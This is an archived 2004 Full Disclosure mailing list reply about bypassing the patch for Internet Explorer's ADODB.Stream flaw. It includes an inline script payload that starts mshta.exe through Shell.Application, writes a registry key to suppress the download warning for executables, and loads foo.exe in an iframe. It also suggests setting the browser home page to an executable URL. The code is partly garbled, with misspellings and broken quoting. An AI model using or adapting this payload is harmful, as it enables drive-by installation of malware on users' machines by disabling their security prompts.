Full Disclosure mailing list archives
Betr.: Re: Fix for IE ADODB.Stream vulnerability is out
From: "http-equiv () excite com" <1 () malware com>
Date: Sat, 3 Jul 2004 02:06:32 -0000
still have to contend with mshta.exe calling out through the iframe and more than likely firewalled long ago, so use it to write the registry to kill the download warning, then use it set the browser home page as http://www..../foo.exe, that or the default search engine. tons of possibilities. Well done Matthew ! <!-- ActiveXObject("Shell.Application"); obj.ShellExecut("mshta.exe","about:<script>var wsh=new ActiveXObject('WScript.Shell');wsh.RegWrite ('HKCR\exefile\EditFlags', 0x38070000, "REG_BINARY");) </script><iframe src=foo.exe>"); --> On quick reflection, I completely missed Matthew's point. It's brilliant. If you can indeed kill the download dialog, kill it, stick a frame in it and bang. If it doesn't work, use the regWrite and re-set the adodb.stream instead, and continue on your merry way. -- http://www.malware.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Betr.: Re: Fix for IE ADODB.Stream vulnerability is out http-equiv () excite com (Jul 02)
- <Possible follow-ups>
- Betr.: Re: Fix for IE ADODB.Stream vulnerability is out http-equiv () excite com (Jul 02)
- Betr.: Re: Fix for IE ADODB.Stream vulnerability is out http-equiv () excite com (Jul 02)